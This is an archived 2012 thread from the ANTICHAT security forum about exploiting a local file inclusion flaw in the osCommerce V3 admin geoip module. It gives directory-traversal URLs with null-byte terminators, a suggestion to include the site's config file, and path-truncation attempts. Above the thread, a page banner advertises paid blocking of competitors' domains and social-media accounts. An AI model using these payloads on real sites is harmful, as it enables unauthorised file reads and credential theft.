УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
OSCommerce V3 LFI

Опции темы

Поиск в этой теме

Опции просмотра

10.06.2012, 05:57

Pirotexnik

Guest

Сообщений: n/a

Провел на форуме:
97332

Репутация: 38

Нашел LFI, но незнаю как реализовать...

http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../../../../../../../../../../../../boot.ini%00

Все бы хорошо, но помимо include() эта переменная используется еще где-то:

Код:

Code:
Fatal error: Call to a member function loadIniFile() on a non-object in C:\web\htdocs\oscommerce\admin\includes\applications\modules_geoip\pages\edit.php on line 18

Код:

Code:
18: $osC_Language->loadIniFile('modules/geoip/' . $_GET['module'] . '.php');

Помогите

15.06.2012, 05:00

pharm_all

Познающий

Регистрация: 10.09.2009

Сообщений: 40

Провел на форуме:
72737

Репутация: 1

Цитата:

Сообщение от Pirotexnik

Pirotexnik said:
Нашел LFI, но незнаю как реализовать...
http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../../../../../../../../../../../../boot.ini%00
Все бы хорошо, но помимо
include()
эта переменная используется еще где-то:

Код:

Code:
Fatal error: Call to a member function loadIniFile() on a non-object in C:\web\htdocs\oscommerce\admin\includes\applications\modules_geoip\pages\edit.php on line 18

Код:

Code:
18: $osC_Language->loadIniFile('modules/geoip/' . $_GET['module'] . '.php');

Помогите

http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../../../../../../../../C:/web/htdocs/oscommerce/includes/conf не помню название конфига.php%00

Проинклудь конфиг, поиграйся.

15.06.2012, 06:20

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Pirotexnik

Шляпу экстрасенса, увы, потерял, поэтому требую код ф-ции loadIniFile =\

И строку с инклюдом данной переменной тоже неплохо бы увидеть.

pharm_all

Что-что, простите? Каким образом он проинклюдит (и как это поможет!?) если у него не работает инклюд?

15.06.2012, 07:19

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Что я делаю не так?

Цитата:

Сообщение от None

Все бы хорошо, но помимо include() эта переменная используется еще где-то:

Посмотрел кодес. Интересно, причем тут это вообще? Инклюд идет в первой строчке скрипта. Причем тут вообще то, что вызывается далее?

16.06.2012, 17:26

Pirotexnik

Guest

Сообщений: n/a

Провел на форуме:
97332

Репутация: 38

Да, затупил я...

Теперь вопрос по поводу .php

http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../lfi - GOOD

http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../lfi.php%00 - BAD

http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../lfi.gif%00 - BAD

./[4096] - тоже не спасли. Это у меня на локалхосте косяк?)

Как быть?